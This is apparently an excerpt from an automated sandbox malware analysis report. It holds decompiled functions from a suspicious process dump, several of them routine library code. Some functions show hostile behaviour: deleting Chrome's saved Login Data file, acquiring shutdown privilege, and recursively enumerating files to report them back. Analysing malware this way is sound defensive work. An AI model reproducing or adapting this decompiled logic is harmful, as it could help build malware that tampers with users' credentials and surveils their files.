                    • Opcode ID: c5d6c748a3025e0694e1f413844546567e9bf099f3b664cefe0f3b0174dc0b66
                    • Instruction ID: 3339c7fc43e202b61d2d70908da88035b8b5669b3a5f9347cfb7e72bae01768d
                    • Opcode Fuzzy Hash: c5d6c748a3025e0694e1f413844546567e9bf099f3b664cefe0f3b0174dc0b66
                    • Instruction Fuzzy Hash: 5E31A07280622C9ACB20E761AC48EDB777CAF04305F0401FBF545D2191EF78DAD48A5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00447A10 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 76%
                    			E00447A10(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t178 = __esi;
				_t171 = __edi;
				_t65 = E0044764F();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E004476AD( &_v8) != 0 || E00447655( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043A5E8();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E0044764F();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E004476AD( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E0043A5E8();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x46f00c; // 0x54ba778e
						_v100 = _t74 ^ _t192;
						 *0x46f344 =  *0x46f344 | 0xffffffff;
						 *0x46f338 =  *0x46f338 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t139 = "TZ";
						_t172 = 0;
						 *0x470758 = 0;
						_t78 = E0043A9B5(__eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E00444A38(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E0043A9B5(__eflags,  &_v280, _t184, _v276, _t139);
									__eflags = _t85;
									if(_t85 == 0) {
										E00445002(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E00445002();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L80:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t172);
								E00447A10(_t139, _t172, _t183, __eflags);
							}
						}
						E00445002(_t183);
						__eflags = _v16 ^ _t192;
						return E004338BB(_v16 ^ _t192);
					} else {
						_t89 = E00447655( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E00447681( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E00445002( *0x470750);
								 *0x470750 = 0;
								 *_t194 = 0x470760;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x470760 * 0x3c;
									_t167 =  *0x4707b4; // 0x0
									_push(_t171);
									 *0x470758 = 1;
									_v12 = _t150;
									__eflags =  *0x4707a6; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x4707fa; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x470808; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E00444607(0, _t167);
									_t99 = WideCharToMultiByte(_t176, 0, 0x470764, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x4707b8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E00447649()) = _v12;
								 *((intOrPtr*)(E0044763D())) = _v16;
								_t96 = E00447643();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x470750; // 0x0
					_t178 = _a4;
					if(_t168 == 0) {
						L12:
						E00445002(_t168);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x447e01
						_t169 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t169 + 1; // 0x447e02
						 *0x470750 = E00444A38(_t154 - _t169, _t13);
						_t116 = E00445002(0);
						_t170 =  *0x470750; // 0x0
						if(_t170 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x447e01
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x447e02
							_t119 = E0044030E(_t170, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E00440303(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E0043A3AC(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E0043A3AC(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E0043A3AC(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E00447649()) = _v8;
										_t128 = E0044763D();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E00440303(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L82:
			}




































































                    0x00447a10
                    0x00447a10
                    0x00447a1a
                    0x00447a1f
                    0x00447a23
                    0x00447a25
                    0x00447a2d
                    0x00447a38
                    0x00447bd8
                    0x00447bda
                    0x00447bdb
                    0x00447bdc
                    0x00447bdd
                    0x00447bde
                    0x00447bdf
                    0x00447be4
                    0x00447be8
                    0x00447bea
                    0x00447bed
                    0x00447bf4
                    0x00447bfb
                    0x00447bff
                    0x00447c02
                    0x00447c05
                    0x00447c0a
                    0x00447c0b
                    0x00447c0d
                    0x00447d35
                    0x00447d35
                    0x00447d36
                    0x00447d37
                    0x00447d38
                    0x00447d39
                    0x00447d3a
                    0x00447d3f
                    0x00447d42
                    0x00447d43
                    0x00447d4b
                    0x00447d52
                    0x00447d55
                    0x00447d62
                    0x00447d69
                    0x00447d6a
                    0x00447d6b
                    0x00447d6c
                    0x00447d71
                    0x00447d80
                    0x00447d87
                    0x00447d8f
                    0x00447d91
                    0x00447d9b
                    0x00447d9e
                    0x00447dab
                    0x00447dae
                    0x00447db0
                    0x00447dc9
                    0x00447dd1
                    0x00447dd3
                    0x00447dd9
                    0x00447dde
                    0x00447dd5
                    0x00447dd5
                    0x00000000
                    0x00447dd5
                    0x00447db2
                    0x00447db2
                    0x00447db3
                    0x00447db3
                    0x00447db3
                    0x00447de0
                    0x00447d93
                    0x00447d93
                    0x00447d93
                    0x00447ded
                    0x00447def
                    0x00447df1
                    0x00447df3
                    0x00447e03
                    0x00447e03
                    0x00447df5
                    0x00447df5
                    0x00447df8
                    0x00000000
                    0x00447dfa
                    0x00447dfa
                    0x00447dfb
                    0x00447e00
                    0x00447df8
                    0x00447e09
                    0x00447e14
                    0x00447e1f
                    0x00447c13
                    0x00447c17
                    0x00447c1c
                    0x00447c1d
                    0x00447c1f
                    0x00000000
                    0x00447c25
                    0x00447c29
                    0x00447c2e
                    0x00447c2f
                    0x00447c31
                    0x00000000
                    0x00447c37
                    0x00447c3d
                    0x00447c42
                    0x00447c48
                    0x00447c4f
                    0x00447c55
                    0x00447c58
                    0x00447c5e
                    0x00447c65
                    0x00447c6b
                    0x00447c6f
                    0x00447c75
                    0x00447c78
                    0x00447c7f
                    0x00447c84
                    0x00447c84
                    0x00447c86
                    0x00447c86
                    0x00447c89
                    0x00447c90
                    0x00447ca8
                    0x00447ca8
                    0x00447cab
                    0x00447c92
                    0x00447c92
                    0x00447c97
                    0x00447c99
                    0x00000000
                    0x00447c9b
                    0x00447c9d
                    0x00447ca3
                    0x00447ca3
                    0x00447c99
                    0x00447cb3
                    0x00447cc7
                    0x00447ccd
                    0x00447ccf
                    0x00447cdd
                    0x00447cdf
                    0x00447cd1
                    0x00447cd1
                    0x00447cd4
                    0x00000000
                    0x00447cd6
                    0x00447cd8
                    0x00447cd8
                    0x00447cd4
                    0x00447cf4
                    0x00447cfb
                    0x00447cfd
                    0x00447d0c
                    0x00447d0f
                    0x00447cff
                    0x00447cff
                    0x00447d02
                    0x00000000
                    0x00447d04
                    0x00447d07
                    0x00447d07
                    0x00447d02
                    0x00447cfd
                    0x00447d19
                    0x00447d23
                    0x00447d28
                    0x00447d2d
                    0x00447d34
                    0x00447d34
                    0x00447c31
                    0x00447c1f
                    0x00447a50
                    0x00447a50
                    0x00447a56
                    0x00447a5b
                    0x00447a91
                    0x00447a92
                    0x00447a98
                    0x00447a9a
                    0x00447a9a
                    0x00447a9d
                    0x00447a9d
                    0x00447a9f
                    0x00447aa0
                    0x00447aa6
                    0x00447ab1
                    0x00447ab6
                    0x00447abb
                    0x00447ac5
                    0x00000000
                    0x00447acb
                    0x00447acb
                    0x00447acd
                    0x00447ace
                    0x00447ace
                    0x00447ad1
                    0x00447ad1
                    0x00447ad3
                    0x00447ad4
                    0x00447adb
                    0x00447ae0
                    0x00447ae5
                    0x00447aea
                    0x00447af2
                    0x00447af3
                    0x00447af9
                    0x00447afe
                    0x00447b03
                    0x00447b09
                    0x00447b0e
                    0x00447b0f
                    0x00447b12
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00447b12
                    0x00447b17
                    0x00447b18
                    0x00447b1d
                    0x00447b1f
                    0x00447b1f
                    0x00447b27
                    0x00447b2d
                    0x00447b30
                    0x00447b30
                    0x00447b34
                    0x00000000
                    0x00000000
                    0x00447b3e
                    0x00447b3e
                    0x00447b41
                    0x00447b44
                    0x00447b46
                    0x00447b54
                    0x00447b56
                    0x00447b60
                    0x00447b60
                    0x00447b62
                    0x00447b64
                    0x00000000
                    0x00000000
                    0x00447b5b
                    0x00447b5d
                    0x00447b5f
                    0x00447b5f
                    0x00000000
                    0x00447b5f
                    0x00000000
                    0x00447b5d
                    0x00447b66
                    0x00447b69
                    0x00447b6b
                    0x00447b76
                    0x00447b78
                    0x00447b82
                    0x00447b82
                    0x00447b84
                    0x00447b86
                    0x00000000
                    0x00000000
                    0x00447b7d
                    0x00447b7f
                    0x00447b81
                    0x00447b81
                    0x00000000
                    0x00447b81
                    0x00000000
                    0x00447b7f
                    0x00447b82
                    0x00447b69
                    0x00447b88
                    0x00447b88
                    0x00447b8a
                    0x00447b8e
                    0x00447b8e
                    0x00447b93
                    0x00447b95
                    0x00447b98
                    0x00447b9b
                    0x00447b9d
                    0x00447ba0
                    0x00447bb8
                    0x00447bbb
                    0x00447bbe
                    0x00447bc6
                    0x00447bcb
                    0x00447bd0
                    0x00000000
                    0x00447bd0
                    0x00447ba2
                    0x00447ba7
                    0x00447baa
                    0x00447baf
                    0x00447bb2
                    0x00447bb4
                    0x00000000
                    0x00000000
                    0x00447bb6
                    0x00447b03
                    0x00000000
                    0x00447aea
                    0x00447a5d
                    0x00447a5d
                    0x00447a5f
                    0x00447a61
                    0x00447a61
                    0x00447a65
                    0x00000000
                    0x00000000
                    0x00447a69
                    0x00447a7d
                    0x00447a7d
                    0x00447a6b
                    0x00447a6b
                    0x00447a6b
                    0x00447a71
                    0x00000000
                    0x00447a73
                    0x00447a73
                    0x00447a76
                    0x00447a7b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00447a7b
                    0x00447a71
                    0x00447a86
                    0x00447a88
                    0x00447bd7
                    0x00447bd7
                    0x00447a8e
                    0x00447a8e
                    0x00000000
                    0x00447a8e
                    0x00000000
                    0x00447a88
                    0x00447a81
                    0x00447a83
                    0x00447a83
                    0x00000000
                    0x00447a83
                    0x00447a5b
                    0x00000000

                    APIs
                    • _free.LIBCMT ref: 00447A92
                    • _free.LIBCMT ref: 00447AB6
                    • _free.LIBCMT ref: 00447C3D
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D204), ref: 00447C4F
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00470764,000000FF,00000000,0000003F,00000000,?,?), ref: 00447CC7
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004707B8,000000FF,?,0000003F,00000000,?), ref: 00447CF4
                    • _free.LIBCMT ref: 00447E09
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                    • String ID:
                    • API String ID: 314583886-0
                    • Opcode ID: a387b2d2763c336cd0f9efd400082f03a7ae001d9dae8456a42e4e8c50b33189
                    • Instruction ID: 0aa257e2c35749d2f3a928c6468fe730eac10fb1cea6214ff30b616faf06b30b
                    • Opcode Fuzzy Hash: a387b2d2763c336cd0f9efd400082f03a7ae001d9dae8456a42e4e8c50b33189
                    • Instruction Fuzzy Hash: 14C15971908245ABFB149F79DC41AAB7BA9EF41318F1440AFE484A7341E7389E43CB9C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040AF8C Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E0040AF8C(void* __edx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t34;

				_t37 = __eflags;
				_t32 = __edi;
				_t31 = E00402073(_t20,  &_v52, __edx, _t33, E0043A9AA(_t20, __eflags, "UserProfile"));
				E00408832(_t20,  &_v28, _t7, _t32, _t33, _t37, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				E00401FB8();
				if(DeleteFileA(E00401F8B( &_v28)) != 0) {
					_t28 = _t34 - 0x18;
					_push("\n[Chrome StoredLogins found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t34 - 0x18;
						_push("\n[Chrome StoredLogins not found]");
						L6:
						E00402073(_t20, _t28, _t31, _t33);
						E0040B752(_t20, _t31, _t33, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00401FB8();
				return _t21;
			}














                    0x0040af8c
                    0x0040af8c
                    0x0040afac
                    0x0040afb1
                    0x0040afba
                    0x0040afd0
                    0x0040aff6
                    0x0040aff8
                    0x00000000
                    0x0040afd2
                    0x0040afd9
                    0x0040afdc
                    0x0040afea
                    0x0040afec
                    0x0040affd
                    0x0040affd
                    0x0040b002
                    0x0040b007
                    0x0040afe3
                    0x0040afe3
                    0x0040afe3
                    0x0040afdc
                    0x0040b00f
                    0x0040b01a

                    APIs
                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040AFC8
                    • GetLastError.KERNEL32 ref: 0040AFD2
                    Strings
                    • [Chrome StoredLogins not found], xrefs: 0040AFEC
                    • UserProfile, xrefs: 0040AF98
                    • [Chrome StoredLogins found, cleared!], xrefs: 0040AFF8
                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040AF93
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • API String ID: 2018770650-1062637481
                    • Opcode ID: e41821ff3410b989b1a412a1a3b9a309f3df184b09367daac72509983c4f29aa
                    • Instruction ID: a37d5e526ed20706eeea9cdf9ddb9e73f46e09c9fe60e21e4a2cfacd82ef4b6e
                    • Opcode Fuzzy Hash: e41821ff3410b989b1a412a1a3b9a309f3df184b09367daac72509983c4f29aa
                    • Instruction Fuzzy Hash: 8001F2B1A802065BCB04B775DC1B8BF7728AD61308B50027FF402B21E2FE39481986CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00416840 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00416840() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
			}






                    0x00416854
                    0x00416866
                    0x00416872
                    0x0041687e
                    0x00416885
                    0x0041689a

                    APIs
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041684D
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00416854
                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416866
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416885
                    • GetLastError.KERNEL32 ref: 0041688B
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                    • String ID: SeShutdownPrivilege
                    • API String ID: 3534403312-3733053543
                    • Opcode ID: b2a577c07cd5a6e11c0a1240a119a4fb26133fa7f03a6e195252090a31f2c8a0
                    • Instruction ID: d2a690f146848b4c7648309cf1ebff16810b1493f15ef7d05bb093e1d547c9c1
                    • Opcode Fuzzy Hash: b2a577c07cd5a6e11c0a1240a119a4fb26133fa7f03a6e195252090a31f2c8a0
                    • Instruction Fuzzy Hash: A2F03A71905229ABDB10ABA0ED0DAEF7FBCEF05612F1000B0B805A1092D6388A04CAF6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408909 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 80%
                    			E00408909(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t101;
				intOrPtr* _t106;
				signed int _t116;
				void* _t128;
				void* _t149;
				void* _t152;
				signed int _t154;
				signed int _t167;
				signed int _t180;
				signed int _t182;
				void* _t265;
				void* _t267;
				void* _t273;
				void* _t275;
				intOrPtr _t276;
				void* _t277;
				void* _t280;

				_t182 = __ecx;
				E00456328(E00456703, _t273);
				_t276 = _t275 - 0x300;
				_push(_t265);
				 *((intOrPtr*)(_t273 - 0x10)) = _t276;
				_t180 = _t182;
				 *(_t273 - 0x18) = _t180;
				E004020BF(_t180, _t273 - 0x9c);
				 *(_t273 - 0x1c) =  *(_t273 - 0x1c) | 0xffffffff;
				 *_t180 = 0;
				 *(_t273 - 4) =  *(_t273 - 4) & 0x00000000;
				_t260 = _t180 + 4;
				E0040480D(_t180 + 4);
				_t101 = E004048A8(_t180 + 4, _t265, _t180 + 4);
				_t282 = _t101;
				if(_t101 == 0) {
					_push(0);
					_push(0);
					goto L4;
				} else {
					_t276 = _t276 - 0x18;
					_t258 = E00402F11(_t273 - 0x6c, _t273 + 0x38, _t273, 0x472ec8);
					E00402EF0(_t180, _t276, _t174, _t273, _t282, _t273 + 0x50);
					_push(0x64);
					_t180 = _t180 & 0xffffff00 | E00404A81(_t260, _t174, _t282) == 0xffffffff;
					E00401FB8();
					if(_t180 != 0) {
						E00404E06(_t258);
						 *((intOrPtr*)(_t273 - 0x20)) = 1;
						_push(0x46ccd0);
						_t152 = _t273 - 0x20;
						L3:
						_push(_t152);
						L4:
						E004379F6();
					}
				}
				_t261 = E004022E5(_t273 + 0x20, _t273 - 0x30);
				_t106 = E004022AA(_t273 + 0x20, _t273 - 0x34);
				E00409291(_t273 - 0x3c,  *((intOrPtr*)(E004022E5(_t273 + 0x20, _t273 - 0x38))),  *_t106,  *_t104);
				_t277 = _t276 + 0xc;
				_t252 = _t273 + 8;
				_t267 = FindFirstFileW(E00401EE4(E004087F0(_t273 - 0x6c, _t273 + 8, _t273, "*")), _t273 - 0x304);
				 *(_t273 - 0x1c) = _t267;
				E00401EE9();
				_t285 = _t267 - 0xffffffff;
				if(_t267 != 0xffffffff) {
					goto L7;
				} else {
					_t276 = _t277 - 0x18;
					E00402073(_t180, _t276, _t252, _t273, 0x464074);
					_push(0x65);
					E00404A81( *(_t273 - 0x18) + 4, _t252, _t285);
					E00404E06(_t252);
					 *((intOrPtr*)(_t273 - 0x24)) = 2;
					_push(0x46ccd0);
					_t152 = _t273 - 0x24;
					goto L3;
				}
				while(1) {
					L7:
					_t116 = FindNextFileW(_t267, _t273 - 0x304);
					__eflags = _t116;
					if(_t116 == 0) {
						break;
					}
					_t180 =  *(_t273 - 0x18);
					__eflags =  *_t180;
					if( *_t180 == 0) {
						__eflags =  *(_t273 - 0x304) & 0x00000010;
						if(( *(_t273 - 0x304) & 0x00000010) == 0) {
							L17:
							E0040415E(_t180, _t273 - 0x84, _t252, _t273, _t273 - 0x2d8);
							_t261 = E004022E5(_t273 - 0x84, _t273 - 0x3c);
							_t270 = E004022AA(_t273 - 0x84, _t273 - 0x38);
							E00409291(_t273 - 0x30,  *((intOrPtr*)(E004022E5(_t273 - 0x84, _t273 - 0x34))),  *_t134,  *_t132);
							_t277 = _t277 + 0xc;
							__eflags = E00409114(_t273 - 0x84, _t273 + 0x20, 0) - 0xffffffff;
							if(__eflags == 0) {
								L20:
								E00401EE9();
								_t267 =  *(_t273 - 0x1c);
								continue;
							} else {
								E00401FC2(_t273 - 0x9c, _t252, _t270, E00402097(_t180, _t273 - 0x54, _t252, _t273, __eflags, _t273 - 0x304, 0x250));
								E00401FB8();
								_t277 = _t277 - 0x18;
								_t252 = E00402EF0(_t180, _t273 - 0x54, E0041A879(_t180, _t273 - 0xb4, _t273 + 8), _t273, __eflags, 0x472ec8);
								E00402EF0(_t180, _t277, _t147, _t273, __eflags, _t273 - 0x9c);
								_push(0x66);
								_t149 = E00404A81(_t180 + 4, _t147, __eflags);
								__eflags = _t149 - 0xffffffff;
								_t180 = _t180 & 0xffffff00 | _t149 == 0xffffffff;
								E00401FB8();
								E00401FB8();
								__eflags = _t180;
								if(_t180 == 0) {
									goto L20;
								} else {
									 *((intOrPtr*)(_t273 - 0x2c)) = 4;
									_push(0x46ccd0);
									_t152 = _t273 - 0x2c;
									goto L3;
								}
							}
						} else {
							_t154 = E0043E224(_t273 - 0x2d8, _t273 - 0x2d8, 0x4644f0);
							__eflags = _t154;
							if(_t154 == 0) {
								goto L17;
							} else {
								__eflags = E0043E224(_t273 - 0x2d8, _t273 - 0x2d8, L"..");
								if(__eflags == 0) {
									goto L17;
								} else {
									_t252 = E00408876(_t180, _t273 - 0xb4, _t273 + 8, _t273, __eflags, E0040415E(_t180, _t273 - 0x54, _t252, _t273, _t273 - 0x2d8));
									E00402FF4(_t180, _t273 - 0x6c, _t159, _t261, _t273, __eflags, "\\");
									E00401EE9();
									E00401EE9();
									_t280 = _t277 - 0x18;
									E004086D0(_t180, _t280, _t159, __eflags, _t273 + 0x20);
									_t277 = _t280 - 0x18;
									E004086D0(_t180, _t277, _t159, __eflags, _t273 - 0x6c);
									_t167 = E00408D1B(_t180, _t159, __eflags);
									__eflags = _t167;
									if(_t167 != 0) {
										E00401EE9();
										goto L17;
									} else {
										 *((intOrPtr*)(_t273 - 0x28)) = 3;
										_push(0x46ccd0);
										_t152 = _t273 - 0x28;
										goto L3;
									}
								}
							}
						}
						L23:
						E00401FB8();
						E00401EE9();
						E00401EE9();
						E00401FB8();
						_t128 = E00401FB8();
						 *[fs:0x0] =  *((intOrPtr*)(_t273 - 0xc));
						return _t128;
					} else {
						FindClose(_t267);
					}
					L10:
					E00404E06(_t252);
					goto L23;
				}
				 *(_t273 - 4) =  *(_t273 - 4) | 0xffffffff;
				FindClose(_t267);
				_t252 = E00402F11(_t273 - 0x54, _t273 + 0x38, _t273, 0x472ec8);
				E00402EF0(_t180, _t277 - 0x18, _t119, _t273, __eflags, _t273 + 0x50);
				_push(0x67);
				E00404A81( *(_t273 - 0x18) + 4, _t119, __eflags);
				E00401FB8();
				goto L10;
			}























                    0x00408909
                    0x0040890e
                    0x00408913
                    0x0040891a
                    0x0040891c
                    0x0040891f
                    0x00408921
                    0x0040892a
                    0x0040892f
                    0x00408933
                    0x00408936
                    0x0040893a
                    0x0040893f
                    0x00408947
                    0x0040894c
                    0x0040894e
                    0x00408cb6
                    0x00408cb8
                    0x00000000
                    0x00408954
                    0x00408954
                    0x0040896e
                    0x00408972
                    0x00408978
                    0x00408984
                    0x0040898a
